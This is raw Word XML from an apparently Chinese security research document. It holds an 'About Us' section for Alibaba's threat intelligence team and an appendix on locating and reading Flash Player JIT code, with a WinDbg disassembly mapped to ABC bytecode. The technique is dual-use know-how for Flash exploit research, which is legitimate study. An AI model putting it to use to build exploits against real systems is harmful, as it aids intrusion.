        <w:spacing w:before="0" w:after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bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>About Us</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB561A" w:rsidRPr="00B83992" w:rsidRDefault="00AB561A" w:rsidP="00B83992">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r w:rsidRPr="00B83992">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>阿里基础安全威胁情报中心是</w:t>
      </w:r>
      <w:r w:rsidRPr="00B83992">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2015</w:t>
      </w:r>
      <w:r w:rsidRPr="00B83992">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r w:rsidRPr="00B83992">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00B83992">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>月新成立的部门，以沉淀阿里的安全数据、建设安全能力和阿里安全的威胁情报体系为使命，欢迎志同道合的小伙伴们加盟。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB561A" w:rsidRPr="00AB561A" w:rsidRDefault="00AB561A" w:rsidP="00BF219C"/>
    <w:p w:rsidR="00E90B0E" w:rsidRPr="00BF219C" w:rsidRDefault="00E90B0E" w:rsidP="00BF219C"/>
    <w:p w:rsidR="00D56920" w:rsidRDefault="008851B0" w:rsidP="00AE40CD">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Appendix</w:t>
      </w:r>
      <w:r w:rsidR="00060AE1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidR="00AE40CD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> DEBUG JIT CODE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B7062C" w:rsidRDefault="00B7062C" w:rsidP="00B7062C"/>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>METHOD</w:t>
      </w:r>
      <w:r w:rsidR="00DB77F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> TO </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JITCODE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用趋势的一位同学写的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>debugjit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的插件，可以定位到方法对应的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jitcode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位置，下载链接：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRDefault="007057EB" w:rsidP="00653A00">
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="00653A00" w:rsidRPr="00895F46">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>http://vdisk.weibo.com/s/uAGaNxKsgN8na/1420788398</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00"/>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之前我也写过一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后面没有时间来继续更新了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主要原理是通过查看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AVMPLUS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工程代码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,HOOK JITCODE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>生成的地方，打印每次生成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JITCODE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址对应的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>METHOD NAME</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>METHOD ID</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00"/>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:r w:rsidRPr="000E740A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="487525B0" wp14:editId="5133BA5C">
            <wp:extent cx="5274310" cy="1998011"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="54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3A00" w:rsidRDefault="00653A00" w:rsidP="00653A00"/>
    <w:p w:rsidR="00653A00" w:rsidRPr="00755E75" w:rsidRDefault="00653A00" w:rsidP="00653A00"/>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ABC CODE </w:t>
      </w:r>
      <w:r w:rsidR="00DB77F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">TO </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JITCODE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00"/>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SWF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>源码生成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ABC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ABC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>生成对应的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">JIT CODE. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>每一段相应的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ABC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对应着生成的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">JIT CODE </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00"/>
    <w:p w:rsidR="00653A00" w:rsidRPr="004226F4" w:rsidRDefault="00653A00" w:rsidP="00653A00"/>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48814B11" wp14:editId="23299761">
            <wp:extent cx="5747716" cy="2051437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945" cy="20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00" w:rsidRDefault="00653A00" w:rsidP="00653A00"/>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看图中源码与对应的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ABC CODE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，对应生成的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jitcode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应该类似</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>all xxx (new bytearray)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:r>
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ov stack_var1 , eax</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ush 0x11111111</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRPr="00811D49" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>all ccc (writeUnsinged)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00"/>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里编译的是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>debug</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版本，每行都会在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>abc code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中生成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> debugline x(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>行号</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，对应</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jit code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中也会有类似</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ush 25</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">all ddd (debugline ) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00"/>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>具体对应生成的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jitCODE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:pPr>
        <w:shd w:val="pct12" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>06379773 6a18            push    18h</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:pPr>
        <w:shd w:val="pct12" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>06379775 8b8d2cffffff    mov     ecx,dword ptr [ebp-0D4h]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRPr="0010296D" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:pPr>
        <w:shd w:val="pct12" w:color="auto" w:fill="auto"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">0637977b e870ab61fb  call    </w:t>
      </w:r>
      <w:r w:rsidRPr="0010296D">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>flashplayer_17_sa_debug!IAEModule_IAEKernel_UnloadModule+0x115d50 (019942f0)</w:t>
      </w:r>
      <w:r w:rsidRPr="0010296D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> //debugline 24</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:pPr>
        <w:shd w:val="pct12" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>06379780 83c40c          add     esp,0Ch</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:pPr>
        <w:shd w:val="pct12" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>06379783 8b8d28ffffff    mov     ecx,dword ptr [ebp-0D8h]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:pPr>
        <w:shd w:val="pct12" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>06379789 8d492c          lea     ecx,[ecx+2Ch]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:pPr>
        <w:shd w:val="pct12" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>0637978c 8d2424          lea     esp,[esp]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:pPr>
        <w:shd w:val="pct12" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>0637978f 8d9570ffffff    lea     edx,[ebp-90h]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRPr="000163AC" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:pPr>
        <w:shd w:val="pct12" w:color="auto" w:fill="auto"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">06379795 e8b66363fb      call    </w:t>
      </w:r>
      <w:r w:rsidRPr="000163AC">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>flashplayer_17_sa_debug!IAEModule_IAEKernel_UnloadModule+0x1315b0 (019afb50)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:pPr>
        <w:shd w:val="pct12" w:color="auto" w:fill="auto"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000163AC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidRPr="00290008">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00290008">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>findpropstrict</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRPr="000163AC" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:pPr>
        <w:shd w:val="pct12" w:color="auto" w:fill="auto"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:pPr>
        <w:shd w:val="pct12" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>0637979a 8b481c          mov     ecx,dword ptr [eax+1Ch]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:pPr>
        <w:shd w:val="pct12" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>0637979d 85c9            test    ecx,ecx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:pPr>
        <w:shd w:val="pct12" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>0637979f 0f8477050000    je      06379d1c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:pPr>
        <w:shd w:val="pct12" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>063797a5 8b7108          mov     esi,dword ptr [ecx+8]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:pPr>
        <w:shd w:val="pct12" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>063797a8 8b5610          mov     edx,dword ptr [esi+10h]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:pPr>
        <w:shd w:val="pct12" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>063797ab 8b7208          mov     esi,dword ptr [edx+8]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:pPr>
        <w:shd w:val="pct12" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>063797ae 8b4218          mov     eax,dword ptr [edx+18h]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:pPr>
        <w:shd w:val="pct12" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>063797b1 ffd0            call    eax</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:pPr>
        <w:shd w:val="pct12" w:color="auto" w:fill="auto"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidRPr="00784B80">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F21D25">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>constructprop</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">  new bytearray();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:pPr>
        <w:shd w:val="pct12" w:color="auto" w:fill="auto"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:pPr>
        <w:shd w:val="pct12" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>063797b3 8945b8          mov     dword ptr [ebp-48h],eax</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:pPr>
        <w:shd w:val="pct12" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>063797b6 8d8d24ffffff    lea     ecx,[ebp-0DCh]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:pPr>
        <w:shd w:val="pct12" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>063797bc 898524ffffff    mov     dword ptr [ebp-0DCh],eax</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:pPr>
        <w:shd w:val="pct12" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>063797c2 8b4604          mov     eax,dword ptr [esi+4]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:pPr>
        <w:shd w:val="pct12" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>063797c5 83ec04          sub     esp,4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:pPr>
        <w:shd w:val="pct12" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>063797c8 51              push    ecx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:pPr>
        <w:shd w:val="pct12" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>063797c9 6a00            push    0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:pPr>
        <w:shd w:val="pct12" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>063797cb 56              push    esi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:pPr>
        <w:shd w:val="pct12" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>063797cc ffd0            call    eax</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:pPr>
        <w:shd w:val="pct12" w:color="auto" w:fill="auto"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidRPr="00F21D25">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F21D25">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>coerce</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:pPr>
        <w:shd w:val="pct12" w:color="auto" w:fill="auto"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRPr="0010296D" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:pPr>
        <w:shd w:val="pct12" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0010296D">
        <w:t>063797ce 83c410          add     esp,10h</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRPr="0010296D" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:pPr>
        <w:shd w:val="pct12" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0010296D">
        <w:t>063797d1 8b75b8          mov     esi,dword ptr [ebp-48h]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRPr="0010296D" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:pPr>
        <w:shd w:val="pct12" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0010296D">
        <w:t>063797d4 8975a0          mov     dword ptr [ebp-60h],esi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:pPr>
        <w:shd w:val="pct12" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0010296D">
        <w:t>063797d7 c6458203        mov     byte ptr [ebp-7Eh],3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRPr="0010296D" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:pPr>
        <w:shd w:val="pct12" w:color="auto" w:fill="auto"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRPr="0010296D" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:pPr>
        <w:shd w:val="pct12" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0010296D">
        <w:t>063797db 83ec0c          sub     esp,0Ch</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653A00" w:rsidRPr="0010296D" w:rsidRDefault="00653A00" w:rsidP="00653A00">
      <w:pPr>
        <w:shd w:val="pct12" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0010296D">
